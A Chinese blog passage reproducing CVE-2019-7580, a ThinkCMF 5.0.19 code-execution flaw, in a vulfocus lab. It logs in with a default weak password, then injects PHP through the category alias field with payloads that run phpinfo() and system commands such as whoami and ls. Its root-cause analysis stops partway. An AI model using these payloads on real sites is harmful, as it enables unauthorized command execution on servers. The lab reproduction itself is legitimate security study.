[vulfocus漏洞复现]thinkcmf 代码执行漏洞复现 (CVE-2019-7580)phpinfo();ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPH

前言

ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。
文章也会在这里同步


0x01进入后台

进入后台路径为:http://ip:port/admin

0x02我们这里使用弱口令登录

账户密码:admin:123456

0x03进入添加分类页面

依次进入
1、门户管理
2、分类管理
3、添加分类

分类名称随便填
分类别名输入poc:

1'=>array(""),phpinfo(),'2

描述随便填


添加后,点击勾,点击显示,出现如下页面

复现成功

获取flag命令:

1'=>array(""),system(‘ls /tmp’),'2

获取system()命令:

1'=>array(""),system(‘whoami’),'2
1'=>array(""),system(‘pwd’),'2

0x04 利用过程与分析

这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞.

将payload插入数据库,写入data/conf/route.php文件

程序的入口是index.php,在index.php中\think\App::run()执行应用。

在App.php的run()函数139行,执行sef::exec();

全部评论

相关推荐

11-24 19:04
已编辑
湖南工商大学 Java
点赞 评论 收藏
分享
评论
点赞
收藏
分享
牛客网
牛客企业服务